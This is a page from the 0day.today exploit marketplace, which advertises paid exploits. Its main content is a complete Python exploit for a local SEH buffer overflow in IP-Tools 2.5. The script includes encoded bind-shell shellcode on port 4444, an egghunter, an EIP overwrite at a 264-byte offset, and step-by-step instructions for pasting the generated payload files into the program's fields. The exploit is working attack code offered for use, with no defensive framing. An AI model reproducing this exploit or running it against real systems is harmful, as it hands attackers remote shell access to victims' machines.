0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter) Exploit
#!/usr/bin/env python #------------------------------------------------------------------------------------------------------------------------------------# # Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) # # Date: 2019-02-06 # # Author: Juan Prescotto # # Tested Against: Win7 Pro SP1 64 bit # # Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe # # Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe # # Version: 2.5 # # Special Thanks to my wife for allowing me spend countless hours on this passion of mine # # Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > # # "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 # #------------------------------------------------------------------------------------------------------------------------------------# # Good Characers: alphanumeric and printable special characters # # EIP Offset Overwrite ("Log to file" field): 264 # # Non-Participating Modules: ip_tools.exe # #------------------------------------------------------------------------------------------------------------------------------------# # "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> # # Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode # #------------------------------------------------------------------------------------------------------------------------------------# ##################EGG Shellcode Generation################################# #msfvenom -p windows/shell_bind_tcp LPORT=4444 BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg #710 bytes + 8 bytes for egg identifier egg = "w00tw00t" egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" egg += "\x69\x6c\x4b\x58\x6d\x52\x35\x50\x35\x50\x75\x50\x63" egg += "\x50\x4f\x79\x4d\x35\x36\x51\x4b\x70\x71\x74\x6e\x6b" egg += "\x36\x30\x46\x50\x6e\x6b\x66\x32\x44\x4c\x6c\x4b\x63" egg += "\x62\x54\x54\x4c\x4b\x72\x52\x65\x78\x34\x4f\x68\x37" egg += "\x52\x6a\x34\x66\x50\x31\x59\x6f\x4c\x6c\x57\x4c\x53" egg += "\x51\x71\x6c\x67\x72\x54\x6c\x31\x30\x5a\x61\x58\x4f" egg += "\x34\x4d\x56\x61\x4f\x37\x68\x62\x4a\x52\x36\x32\x66" egg += "\x37\x4e\x6b\x36\x32\x42\x30\x6c\x4b\x50\x4a\x35\x6c" egg += "\x4c\x4b\x72\x6c\x44\x51\x44\x38\x78\x63\x32\x68\x55" egg += "\x51\x78\x51\x43\x61\x6e\x6b\x76\x39\x45\x70\x75\x51" egg += "\x59\x43\x6e\x6b\x33\x79\x42\x38\x4d\x33\x65\x6a\x71" egg += "\x59\x6e\x6b\x36\x54\x4e\x6b\x36\x61\x78\x56\x46\x51" egg += "\x49\x6f\x4e\x4c\x79\x51\x7a\x6f\x66\x6d\x35\x51\x48" egg += "\x47\x36\x58\x79\x70\x30\x75\x39\x66\x33\x33\x33\x4d" egg += "\x58\x78\x57\x4b\x73\x4d\x56\x44\x53\x45\x48\x64\x61" egg += "\x48\x4e\x6b\x72\x78\x67\x54\x57\x71\x69\x43\x73\x56" egg += "\x6e\x6b\x54\x4c\x50\x4b\x6c\x4b\x53\x68\x37\x6c\x73" egg += "\x31\x58\x53\x4c\x4b\x74\x44\x4e\x6b\x67\x71\x48\x50" egg += "\x4f\x79\x70\x44\x36\x44\x76\x44\x51\x4b\x71\x4b\x55" egg += "\x31\x46\x39\x32\x7a\x63\x61\x4b\x4f\x6b\x50\x53\x6f" egg += "\x61\x4f\x61\x4a\x4c\x4b\x62\x32\x6a\x4b\x6e\x6d\x31" egg += "\x4d\x63\x58\x75\x63\x54\x72\x35\x50\x45\x50\x33\x58" egg += "\x52\x57\x33\x43\x36\x52\x73\x6f\x62\x74\x33\x58\x30" egg += "\x4c\x31\x67\x54\x66\x63\x37\x69\x6f\x6e\x35\x78\x38" egg += "\x4e\x70\x63\x31\x37\x70\x43\x30\x35\x79\x4f\x34\x32" egg += "\x74\x46\x30\x51\x78\x36\x49\x4f\x70\x52\x4b\x63\x30" egg += "\x59\x6f\x38\x55\x73\x5a\x43\x38\x70\x59\x36\x30\x49" egg += "\x72\x59\x6d\x57\x30\x52\x70\x47\x30\x50\x50\x51\x78" egg += "\x5a\x4a\x44\x4f\x6b\x6f\x79\x70\x39\x6f\x39\x45\x4f" egg += "\x67\x65\x38\x44\x42\x77\x70\x64\x51\x71\x4c\x6c\x49" egg += "\x6d\x36\x32\x4a\x72\x30\x63\x66\x56\x37\x30\x68\x68" egg += "\x42\x4b\x6b\x64\x77\x61\x77\x59\x6f\x39\x45\x70\x57" egg += "\x35\x38\x6d\x67\x68\x69\x65\x68\x59\x6f\x6b\x4f\x4a" egg += "\x75\x36\x37\x75\x38\x34\x34\x58\x6c\x57\x4b\x4d\x31" egg += "\x49\x6f\x4a\x75\x51\x47\x4e\x77\x55\x38\x32\x55\x52" egg += "\x4e\x70\x4d\x43\x51\x39\x6f\x6e\x35\x51\x78\x70\x63" egg += "\x32\x4d\x33\x54\x77\x70\x6e\x69\x68\x63\x30\x57\x63" egg += "\x67\x30\x57\x55\x61\x6b\x46\x71\x7a\x56\x72\x31\x49" egg += "\x62\x76\x6d\x32\x79\x6d\x55\x36\x6a\x67\x62\x64\x51" egg += "\x34\x67\x4c\x73\x31\x33\x31\x6e\x6d\x71\x54\x44\x64" egg += "\x66\x70\x39\x56\x43\x30\x77\x34\x43\x64\x76\x30\x72" egg += "\x76\x61\x46\x50\x56\x32\x66\x30\x56\x62\x6e\x72\x76" egg += "\x53\x66\x61\x43\x52\x76\x62\x48\x44\x39\x78\x4c\x45" egg += "\x6f\x4f\x76\x69\x6f\x68\x55\x6b\x39\x39\x70\x42\x6e" egg += "\x66\x36\x50\x46\x69\x6f\x36\x50\x75\x38\x33\x38\x4b" egg += "\x37\x67\x6d\x73\x50\x69\x6f\x6a\x75\x6d\x6b\x58\x70" egg += "\x4d\x65\x79\x32\x76\x36\x75\x38\x4e\x46\x6f\x65\x6d" egg += "\x6d\x6f\x6d\x69\x6f\x79\x45\x35\x6c\x73\x36\x31\x6c" egg += "\x44\x4a\x6b\x30\x79\x6b\x4d\x30\x73\x45\x74\x45\x6f" egg += "\x4b\x30\x47\x32\x33\x31\x62\x72\x4f\x52\x4a\x37\x70" egg += "\x72\x73\x49\x6f\x7a\x75\x41\x41" f = open ("egg.txt", "w") f.write(egg) f.close() ##################EGG Hunter Shellcode Generation################################# #encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode proceeded by xor edx,edx (start egg hunting at 0x00000000) #echo -ne "\x33\xd2\x31\xdb\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58\x33\xc9\x8b\xd4\x64\xff\x13\x5e\x5a\x3c\x05\x74\xe9\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p - #150 bytes egghunter = "" egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" egghunter += "\x42\x75\x4a\x49\x35\x63\x4b\x62\x30\x31\x4b\x6b" egghunter += "\x52\x73\x56\x33\x46\x33\x46\x33\x58\x33\x49\x50" egghunter += "\x45\x36\x6f\x71\x6a\x6a\x6b\x4f\x46\x6f\x31\x52" egghunter += "\x66\x32\x72\x4a\x55\x76\x32\x78\x70\x33\x38\x49" egghunter += "\x6e\x6b\x5a\x74\x55\x34\x79\x6f\x37\x63\x53\x6e" egghunter += "\x62\x7a\x55\x6c\x66\x65\x51\x64\x4d\x39\x48\x38" egghunter += "\x30\x77\x50\x30\x70\x30\x74\x34\x4e\x6b\x58\x7a" egghunter += "\x6c\x6f\x51\x65\x4a\x44\x4e\x4f\x42\x55\x79\x71" egghunter += "\x69\x6f\x6a\x47\x41\x41" #0x00473259 : {pivot 64 / 0x40}[IP_TOOLS.EXE] eip = "\x59\x32\x47\x00" buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip f = open ("egghunter.txt", "w") f.write(buffer) f.close() # 0day.today [2024-10-06] #